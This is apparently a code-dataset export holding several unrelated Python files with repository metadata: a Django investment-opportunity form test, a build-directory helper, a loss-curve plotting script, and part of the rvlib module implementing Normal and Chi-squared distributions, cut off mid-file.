"MIT"
] | 556
|
2019-01-31T15:31:05.000Z
|
2022-03-24T09:44:26.000Z
|
investment_atlas/tests/test_forms.py
|
froddd/great-international-ui
|
414bcb09d701cd7e0c5748d1ac8c587d704f92da
|
[
"MIT"
] | 6
|
2019-03-07T12:57:49.000Z
|
2021-11-02T15:23:51.000Z
|
from directory_constants import choices
from investment_atlas import forms
from investment_atlas.forms import HOW_CAN_WE_HELP_CHOICES, HOW_DID_YOU_HEAR_CHOICES
def test_high_potential_opportunity_form_serialize_data(captcha_stub):
    """The FDI opportunity form serialises every submitted field plus the
    captcha result, a human-readable list of opportunity URLs, and any
    UTM tracking data supplied alongside the submission."""
    utm_data = {
        'utm_source': 'test_source',
        'utm_medium': 'test_medium',
        'utm_campaign': 'test_campaign',
        'utm_term': 'test_term',
        'utm_content': 'test_content'
    }
    # Fields the user submits which are expected to round-trip unchanged
    # into the serialized payload.
    submitted_fields = {
        'given_name': 'Jim',
        'family_name': 'Example',
        'job_title': 'Chief chief',
        'email_address': 'test@example.com',
        'phone_number': '555',
        'company_name': 'Example corp',
        'website_url': 'example.com',
        'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
        'country': choices.COUNTRY_CHOICES[1][0],
        'industry': [choices.INDUSTRIES[0][0]],
        'opportunities': [
            'http://www.e.com/a',
            'http://www.e.com/b',
        ],
        'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
        'your_plans': 'Lorem ipsum dolor sit amet',
        'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
        'email_contact_consent': True,
        'telephone_contact_consent': True,
    }

    form = forms.ForeignDirectInvestmentOpportunityForm(
        data={**submitted_fields, 'g-recaptcha-response': captcha_stub},
        opportunity_choices=[
            ('http://www.e.com/a', 'some great opportunity'),
            ('http://www.e.com/b', 'some other great opportunity'),
        ],
        utm_data=utm_data,
    )

    assert form.is_valid()

    expected = {
        **submitted_fields,
        'captcha': 'PASSED',
        # Opportunity URLs are rendered as a bulleted, human-readable list.
        'opportunity_urls': (
            '• some great opportunity: http://www.e.com/a\n'
            '• some other great opportunity: http://www.e.com/b'
        ),
        **utm_data,
    }
    assert form.serialized_data == expected
def test_hpo_form_serialize_data_without_utm_data(captcha_stub):
    """When no UTM data is passed to the form, the serialized payload
    still carries every utm_* key, each as an empty string."""
    # Fields the user submits which are expected to round-trip unchanged
    # into the serialized payload.
    submitted_fields = {
        'given_name': 'Jim',
        'family_name': 'Example',
        'job_title': 'Chief chief',
        'email_address': 'test@example.com',
        'phone_number': '555',
        'company_name': 'Example corp',
        'website_url': 'example.com',
        'company_address': '123 Some Street, \nSome town, \nSomewhere, \nNarnia',
        'country': choices.COUNTRY_CHOICES[1][0],
        'industry': [choices.INDUSTRIES[0][0]],
        'opportunities': [
            'http://www.e.com/a',
            'http://www.e.com/b',
        ],
        'how_can_we_help': HOW_CAN_WE_HELP_CHOICES[0][0],
        'your_plans': 'Lorem ipsum dolor sit amet',
        'how_did_you_hear': HOW_DID_YOU_HEAR_CHOICES[0][0],
        'email_contact_consent': True,
        'telephone_contact_consent': True,
    }

    # Note: utm_data is deliberately omitted here.
    form = forms.ForeignDirectInvestmentOpportunityForm(
        data={**submitted_fields, 'g-recaptcha-response': captcha_stub},
        opportunity_choices=[
            ('http://www.e.com/a', 'some great opportunity'),
            ('http://www.e.com/b', 'some other great opportunity'),
        ],
    )

    assert form.is_valid()

    expected = {
        **submitted_fields,
        'captcha': 'PASSED',
        'opportunity_urls': (
            '• some great opportunity: http://www.e.com/a\n'
            '• some other great opportunity: http://www.e.com/b'
        ),
        # Missing UTM data serialises as empty strings, not missing keys.
        'utm_source': '',
        'utm_medium': '',
        'utm_campaign': '',
        'utm_term': '',
        'utm_content': '',
    }
    assert form.serialized_data == expected
| 38.021429
| 85
| 0.559459
| 594
| 5,323
| 4.727273
| 0.158249
| 0.039886
| 0.045584
| 0.062678
| 0.921652
| 0.907764
| 0.907764
| 0.907764
| 0.907764
| 0.907764
| 0
| 0.014834
| 0.290813
| 5,323
| 139
| 86
| 38.294964
| 0.727947
| 0
| 0
| 0.863636
| 0
| 0
| 0.425136
| 0.034567
| 0
| 0
| 0
| 0
| 0.030303
| 1
| 0.015152
| false
| 0.015152
| 0.022727
| 0
| 0.037879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
345516148863c822bd9705322b6cdd3f37e687c5
| 167
|
py
|
Python
|
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | null | null | null |
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | null | null | null |
script/lib/config.py
|
Smyled/libchromiumcontent-master
|
97331aff08ce10ce0dbde034af622b8b8e8432b9
|
[
"MIT"
] | 2
|
2019-09-05T03:27:45.000Z
|
2019-10-03T13:02:48.000Z
|
#!/usr/bin/env python
import os
def get_output_dir(source_root, target_arch, component):
    """Return the build output directory for one architecture/component.

    The layout is ``<source_root>/src/out-<target_arch>/<component>``.
    """
    arch_dir = 'out-' + target_arch
    return os.path.join(source_root, 'src', arch_dir, component)
| 20.875
| 74
| 0.742515
| 26
| 167
| 4.538462
| 0.769231
| 0.169492
| 0.322034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11976
| 167
| 7
| 75
| 23.857143
| 0.802721
| 0.11976
| 0
| 0
| 0
| 0
| 0.047945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cafc040dadb6c88be8e887d41862956d8d48843b
| 6,269
|
py
|
Python
|
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
evaluation/plot_bce_graph.py
|
deanzadok/finemotions
|
273991faf45efe8d236727bdfccb08cc0c69bed4
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size': 12})

# Three methods compared in the figure; order matches methods_folders below.
METHODS_NAMES = ['SF', 'MF', 'CBMF']
NUM_EPOCHS = 20
NUM_EXPS = 5  # experiments (cross-validation folds) per method
GRAPH_FORMAT = 'png'
# GRAPH_TITLE = 'Piano Playing'
# GRAPH_FILE = 'piano_playing'
GRAPH_TITLE = 'Keyboard Typing'
GRAPH_FILE = 'keyboard_typing'

# Select the per-method, per-fold experiment directories for the chosen task.
# Each inner list holds NUM_EXPS run folders (one per k-fold split).
# NOTE(review): the third piano list below contains "multityping" in its
# paths even though it sits in the piano branch — presumably intentional
# (retrained models), but worth confirming against the experiment logs.
if GRAPH_FILE == 'piano_playing':
    methods_folders = [['/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_01_st0.8_kf4',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_02_st0.8_kf0',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_03_st0.8_kf1',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_04_st0.8_kf2',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multimidi_all/deepnetunet_224res_1imgs_calib_all_multiplaying_05_st0.8_kf3'],
                       ['/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_03_st0.8_sequence_kf4',
                        '/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_04_st0.8_sequence_kf1',
                        '/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_05_st0.8_sequence_kf0',
                        '/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_06_st0.8_sequence_kf2',
                        '/mnt/walkure_public/deanz/models/mfm/us2multimidi_all/mfmunet_224res_8imgs_calib_all_multiplaying_07_st0.8_sequence_kf3'],
                       ['/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_13_st0.8_sequence_reslayer_retrained_mp_4qloss_kf4',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_14_st0.8_sequence_reslayer_retrained_mp_4qloss_kf0',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_15_st0.8_sequence_reslayer_retrained_mp_4qloss_kf1',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_16_st0.8_sequence_reslayer_retrained_mp_4qloss_kf2',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multimidi_all/mfmunet_224res_8imgs_calib_all_multityping_17_st0.8_sequence_reslayer_retrained_mp_4qloss_kf3']]
else:
    methods_folders = [['/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_01_st0.8_kf4',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_02_st0.8_kf0',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_03_st0.8_kf1',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_04_st0.8_kf2',
                        '/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_05_st0.8_kf3'],
                       ['/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_05_st0.8_sequence_kf4',
                        '/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_06_st0.8_sequence_kf1',
                        '/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_07_st0.8_sequence_kf0',
                        '/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_08_st0.8_sequence_kf2',
                        '/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_09_st0.8_sequence_kf3'],
                       ['/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_23_st0.8_sequence_reslayer_retrained_mt_4qloss_kf4',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_24_st0.8_sequence_reslayer_retrained_mt_4qloss_kf0',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_25_st0.8_sequence_reslayer_retrained_mt_4qloss_kf1',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_26_st0.8_sequence_reslayer_retrained_mt_4qloss_kf2',
                        '/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_27_st0.8_sequence_reslayer_retrained_mt_4qloss_kf3']]

# Collect the first NUM_EPOCHS test-set BCE values from each run's metric.csv
# into a (method, fold, epoch) array.
bce_losses = np.zeros((len(METHODS_NAMES),NUM_EXPS,NUM_EPOCHS))
for i, method_exps in enumerate(methods_folders):
    for j, exp_dir in enumerate(method_exps):
        bce_losses[i, j, :] = pd.read_csv(os.path.join(exp_dir, 'metric.csv'))['test_dev_loss'].iloc[:NUM_EPOCHS].values

# plot graph
# Per-method per-epoch mean/min/max over folds.
# NOTE(review): rows 1 (min) and 2 (max) are computed but never plotted —
# the shaded band below uses mean +/- std instead; possibly leftovers.
bce_losses_features = np.zeros((len(METHODS_NAMES),3,NUM_EPOCHS))
for i in range(len(METHODS_NAMES)):
    bce_losses_features[i, 0, :] = bce_losses[i,:,:].mean(axis=0)
    bce_losses_features[i, 1, :] = bce_losses[i,:,:].min(axis=0)
    bce_losses_features[i, 2, :] = bce_losses[i,:,:].max(axis=0)
    # Mean curve plus a +/- one-standard-deviation band across folds.
    plt.plot(range(1, NUM_EPOCHS+1), bce_losses_features[i, 0, :], label=METHODS_NAMES[i])
    plt.fill_between(range(1, NUM_EPOCHS+1), bce_losses_features[i, 0, :] + bce_losses[i,:,:].std(axis=0), bce_losses_features[i, 0, :] - bce_losses[i,:,:].std(axis=0), alpha=0.5)

plt.legend(fontsize=12)
plt.xticks(range(1, NUM_EPOCHS+1, 2), fontsize=12)
plt.yticks(fontsize=12)
plt.xlim([1, NUM_EPOCHS])
plt.xlabel('Epoch')
plt.ylabel(r"$\mathcal{L}_{BCE}$")
plt.grid(True)
plt.tight_layout(pad=0.05)
# os.path.join with a single argument is a no-op; kept for byte-compatibility.
plt.savefig(os.path.join("bce_graph_{}.{}".format(GRAPH_FILE, GRAPH_FORMAT)))
| 84.716216
| 180
| 0.757378
| 864
| 6,269
| 5.006944
| 0.166667
| 0.069348
| 0.110957
| 0.145631
| 0.812529
| 0.798659
| 0.786177
| 0.711743
| 0.681923
| 0.681923
| 0
| 0.066208
| 0.142287
| 6,269
| 74
| 181
| 84.716216
| 0.73833
| 0.011007
| 0
| 0
| 0
| 0
| 0.64386
| 0.623689
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.063492
| 0
| 0.063492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b1f6f4c00d5df492fd62834aa73c3f1cc9edd08
| 107,082
|
py
|
Python
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 42
|
2016-08-25T13:55:20.000Z
|
2022-02-04T23:53:45.000Z
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 17
|
2016-08-23T18:37:56.000Z
|
2022-02-22T04:46:07.000Z
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 11
|
2016-08-23T23:58:27.000Z
|
2021-07-25T19:48:51.000Z
|
"""
Univariate distributions.
@authors : Daniel Csaba <daniel.csaba@nyu.edu>
Spencer Lyon <spencer.lyon@stern.nyu.edu>
@date : 2016-07-26
"""
from os.path import join, dirname, abspath
from numba import vectorize, jit
from numba.experimental import jitclass
from numba import int32, float32
import numpy as np
from .specials import gamma, lgamma, digamma, beta, bessel_k, set_seed
from . import _rmath_ffi
from numba.core.typing import cffi_utils as cffi_support
# Register the compiled Rmath CFFI module with numba so its functions can be
# called from nopython-mode code in the @vectorize/@jit wrappers below.
cffi_support.register_module(_rmath_ffi)

# shut down divide by zero warnings for now
# NOTE(review): filterwarnings("ignore") silences ALL warnings process-wide,
# not just divide-by-zero — confirm this blanket suppression is intended.
import warnings
warnings.filterwarnings("ignore")

import yaml

# Distribution metadata (parameter names, descriptions, pdf TeX) shipped next
# to this module; consumed by _create_class_docstr for each class below.
fn = join(dirname(abspath(__file__)), "metadata.yaml")
with open(fn, 'r') as ymlfile:
    mtdt = yaml.safe_load(ymlfile)
# --------------------------------------------------
# docstring following Spencer Lyon's distcan package
# https://github.com/spencerlyon2/distcan.git
# --------------------------------------------------
univariate_class_docstr = r"""
Construct a distribution representing {name_doc} random variables. The
probability density function of the distribution is given by
.. math::
{pdf_tex}
Parameters
----------
{param_list}
Attributes
----------
{param_attributes}
location: scalar(float)
location of the distribution
scale: scalar(float)
scale of the distribution
shape: scalar(float)
shape of the distribution
mean : scalar(float)
mean of the distribution
median: scalar(float)
median of the distribution
mode : scalar(float)
mode of the distribution
var : scalar(float)
variance of the distribution
std : scalar(float)
standard deviation of the distribution
skewness : scalar(float)
skewness of the distribution
kurtosis : scalar(float)
kurtosis of the distribution
isplatykurtic : Boolean
boolean indicating if kurtosis > 0
isleptokurtic : bool
boolean indicating if kurtosis < 0
ismesokurtic : bool
boolean indicating if kurtosis == 0
entropy : scalar(float)
entropy value of the distribution
"""
param_str = "{name_doc} : {kind}\n {descr}"
def _create_param_list_str(names, descrs, kinds="scalar(float)"):
    """Build the numpydoc ``Parameters`` section body for a distribution.

    Parameters
    ----------
    names : str or sequence of str
        Parameter name(s); a bare string is treated as a single name.
    descrs : str or sequence of str
        One description per name; a bare string is treated as a single
        description.
    kinds : str or sequence of str, optional
        Type annotation(s); a single string is repeated for every name.

    Returns
    -------
    str
        Newline-joined ``param_str`` entries, one per parameter.

    Raises
    ------
    ValueError
        If ``kinds`` (when a sequence) or ``descrs`` does not have the
        same number of entries as ``names``.
    """
    names = (names, ) if isinstance(names, str) else names
    # BUG FIX: this line previously re-coerced `names` a second time,
    # leaving a bare-string `descrs` untouched so len(descrs) counted
    # characters instead of entries (and descrs[i] yielded single chars).
    descrs = (descrs, ) if isinstance(descrs, str) else descrs
    if isinstance(kinds, (list, tuple)):
        if len(names) != len(kinds):
            raise ValueError("Must have same number of names and kinds")
    if isinstance(kinds, str):
        # Repeat the single kind string once per parameter.
        kinds = [kinds for i in range(len(names))]
    if len(descrs) != len(names):
        raise ValueError("Must have same number of names and descrs")
    params = []
    for i in range(len(names)):
        n, k, d = names[i], kinds[i], descrs[i]
        params.append(param_str.format(name_doc=n, kind=k, descr=d))
    return str.join("\n", params)
def _create_class_docstr(name_doc, param_names, param_descrs,
                         param_kinds="scalar(float)",
                         pdf_tex=r"\text{not given}", **kwargs):
    """Render the shared ``univariate_class_docstr`` template for one
    distribution, filling in its name, pdf TeX and parameter sections.
    Extra metadata keys are accepted (and ignored) via ``**kwargs``."""
    param_list = _create_param_list_str(param_names, param_descrs,
                                        param_kinds)
    param_attributes = str.join(", ", param_names) + " : See Parameters"
    # Fill the template explicitly rather than via **locals().
    return univariate_class_docstr.format(
        name_doc=name_doc,
        pdf_tex=pdf_tex,
        param_list=param_list,
        param_attributes=param_attributes,
    )
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath entry points for the normal distribution: d/p/q = density /
# cumulative / quantile, following R's naming convention.
dnorm = _rmath_ffi.lib.dnorm
pnorm = _rmath_ffi.lib.pnorm
qnorm = _rmath_ffi.lib.qnorm

# Elementwise wrappers. The trailing int flags mirror Rmath's
# (lower_tail, give_log) arguments: pdf/logpdf toggle give_log, the
# cdf-family wrappers below select (lower_tail, log_p) combinations.

@vectorize(nopython=True)
def norm_pdf(mu, sigma, x):
    return dnorm(x, mu, sigma, 0)


@vectorize(nopython=True)
def norm_logpdf(mu, sigma, x):
    return dnorm(x, mu, sigma, 1)


@vectorize(nopython=True)
def norm_cdf(mu, sigma, x):
    return pnorm(x, mu, sigma, 1, 0)


@vectorize(nopython=True)
def norm_ccdf(mu, sigma, x):
    return pnorm(x, mu, sigma, 0, 0)


@vectorize(nopython=True)
def norm_logcdf(mu, sigma, x):
    return pnorm(x, mu, sigma, 1, 1)


@vectorize(nopython=True)
def norm_logccdf(mu, sigma, x):
    return pnorm(x, mu, sigma, 0, 1)


@vectorize(nopython=True)
def norm_invcdf(mu, sigma, q):
    return qnorm(q, mu, sigma, 1, 0)


@vectorize(nopython=True)
def norm_invccdf(mu, sigma, q):
    return qnorm(q, mu, sigma, 0, 0)


@vectorize(nopython=True)
def norm_invlogcdf(mu, sigma, lq):
    return qnorm(lq, mu, sigma, 1, 1)


@vectorize(nopython=True)
def norm_invlogccdf(mu, sigma, lq):
    return qnorm(lq, mu, sigma, 0, 1)


# Scalar sampler; drawn one value at a time by Normal.rand.
rnorm = _rmath_ffi.lib.rnorm


@jit(nopython=True)
def norm_rand(mu, sigma):
    return rnorm(mu, sigma)


# Moment generating and characteristic functions (closed forms).
@vectorize(nopython=True)
def norm_mgf(mu, sigma, x):
    return np.exp(x * mu + 0.5 * sigma**2 * x**2)


@vectorize(nopython=True)
def norm_cf(mu, sigma, x):
    return np.exp(1j * x * mu - 0.5 * sigma**2 * x**2)

# -------------
# Normal
# -------------

# numba jitclass field spec for Normal below.
spec = [
    ('mu', float32), ('sigma', float32)
]
# Normal(mu, sigma) distribution. All heavy lifting is delegated to the
# Rmath-backed norm_* wrappers above; the jitclass only stores parameters.
@jitclass(spec)
class Normal():

    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Normal'])

    def __init__(self, mu, sigma):
        self.mu, self.sigma = mu, sigma

    def __str__(self):
        return "Normal(mu=%.5f, sigma=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.mu, self.sigma)

    @property
    def location(self):
        """Return location parameter if exists."""
        return self.mu

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.sigma

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return self.mu

    @property
    def median(self):
        """Return the median."""
        return self.quantile(.5)

    @property
    def mode(self):
        """Return the mode."""
        return self.mu

    @property
    def var(self):
        """Return the variance."""
        return self.sigma ** 2

    @property
    def std(self):
        """Return the standard deviation."""
        return self.sigma

    @property
    def skewness(self):
        """Return the skewness."""
        return 0.0

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # 0.0 here (and -1.2 for Uniform) indicates the *excess* kurtosis
        # convention — presumably intentional; confirm against callers.
        return 0.0

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        # NOTE(review): statistically, "platykurtic" usually means excess
        # kurtosis < 0 (and leptokurtic > 0); these two properties look
        # swapped relative to that convention, though each matches its own
        # docstring. Behavior left as-is — confirm before relying on names.
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Closed form: 0.5*(ln(2*pi) + 1) + ln(sigma).
        return 0.5 * (np.log(2*np.pi) + 1.0) + np.log(self.sigma)

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return norm_mgf(self.mu, self.sigma, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return norm_cf(self.mu, self.sigma, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return -np.inf < x < np.inf

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return norm_pdf(self.mu, self.sigma, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return norm_logpdf(self.mu, self.sigma, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(norm_logpdf(self.mu, self.sigma, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return norm_cdf(self.mu, self.sigma, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return norm_ccdf(self.mu, self.sigma, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return norm_logcdf(self.mu, self.sigma, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return norm_logccdf(self.mu, self.sigma, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return norm_invcdf(self.mu, self.sigma, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return norm_invccdf(self.mu, self.sigma, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return norm_invlogcdf(self.mu, self.sigma, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return norm_invlogccdf(self.mu, self.sigma, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # np.ndenumerate is used (rather than range) because it is supported
        # in nopython mode; out is 1-D so each index i is a 1-tuple.
        for i, _ in np.ndenumerate(out):
            out[i] = norm_rand(self.mu, self.sigma)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath entry points for the chi-squared distribution with v degrees
# of freedom (d/p/q = density / cumulative / quantile, R naming).
dchisq = _rmath_ffi.lib.dchisq
pchisq = _rmath_ffi.lib.pchisq
qchisq = _rmath_ffi.lib.qchisq

# Elementwise wrappers; trailing int flags mirror Rmath's
# (lower_tail, give_log/log_p) arguments, as in the norm_* family.

@vectorize(nopython=True)
def chisq_pdf(v, x):
    return dchisq(x, v, 0)


@vectorize(nopython=True)
def chisq_logpdf(v, x):
    return dchisq(x, v, 1)


@vectorize(nopython=True)
def chisq_cdf(v, x):
    return pchisq(x, v, 1, 0)


@vectorize(nopython=True)
def chisq_ccdf(v, x):
    return pchisq(x, v, 0, 0)


@vectorize(nopython=True)
def chisq_logcdf(v, x):
    return pchisq(x, v, 1, 1)


@vectorize(nopython=True)
def chisq_logccdf(v, x):
    return pchisq(x, v, 0, 1)


@vectorize(nopython=True)
def chisq_invcdf(v, q):
    return qchisq(q, v, 1, 0)


@vectorize(nopython=True)
def chisq_invccdf(v, q):
    return qchisq(q, v, 0, 0)


@vectorize(nopython=True)
def chisq_invlogcdf(v, lq):
    return qchisq(lq, v, 1, 1)


@vectorize(nopython=True)
def chisq_invlogccdf(v, lq):
    return qchisq(lq, v, 0, 1)


# Scalar sampler; drawn one value at a time by Chisq.rand.
rchisq = _rmath_ffi.lib.rchisq


@jit(nopython=True)
def chisq_rand(v):
    return rchisq(v)


# Moment generating and characteristic functions (closed forms).
@vectorize(nopython=True)
def chisq_mgf(v, x):
    return (1.0 - 2.0 * x)**(-v * 0.5)


@vectorize(nopython=True)
def chisq_cf(v, x):
    return (1.0 - 2.0 * 1j * x)**(-v * 0.5)

# -------------
# Chisq
# -------------

# numba jitclass field spec for Chisq below (rebinds the module-level name).
spec = [
    ('v', int32)
]
# Chi-squared distribution with v degrees of freedom, backed by the
# Rmath chisq_* wrappers above.
@jitclass(spec)
class Chisq():

    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Chisq'])

    def __init__(self, v):
        self.v = v

    def __str__(self):
        return "ChiSquared(k=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        # NOTE(review): (self.v) is a parenthesised scalar, not a 1-tuple —
        # that would be (self.v,). __str__'s %-formatting accepts either,
        # so behavior is unchanged here; confirm no caller expects a tuple.
        return (self.v)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return self.v

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return self.v

    @property
    def median(self):
        """Return the median."""
        return self.quantile(.5)

    @property
    def mode(self):
        """Return the mode."""
        # Mode of chi-squared is max(v - 2, 0).
        return max(self.v - 2, 0)

    @property
    def var(self):
        """Return the variance."""
        return self.v * 2.0

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.v * 2.0)

    @property
    def skewness(self):
        """Return the skewness."""
        return np.sqrt(8.0 / self.v)

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Excess-kurtosis convention, consistent with the other classes.
        return 12.0 / self.v

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        # NOTE(review): naming looks swapped vs. the usual statistical
        # convention (platykurtic normally means excess kurtosis < 0);
        # each property matches its own docstring, so left as-is.
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Closed form: v/2 + ln(2) + lgamma(v/2) + (1 - v/2)*digamma(v/2).
        return .5 * self.v + np.log(2.0) + lgamma(.5 * self.v) + (1.0 - .5 * self.v) * digamma(.5 * self.v)

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return chisq_mgf(self.v, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return chisq_cf(self.v, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
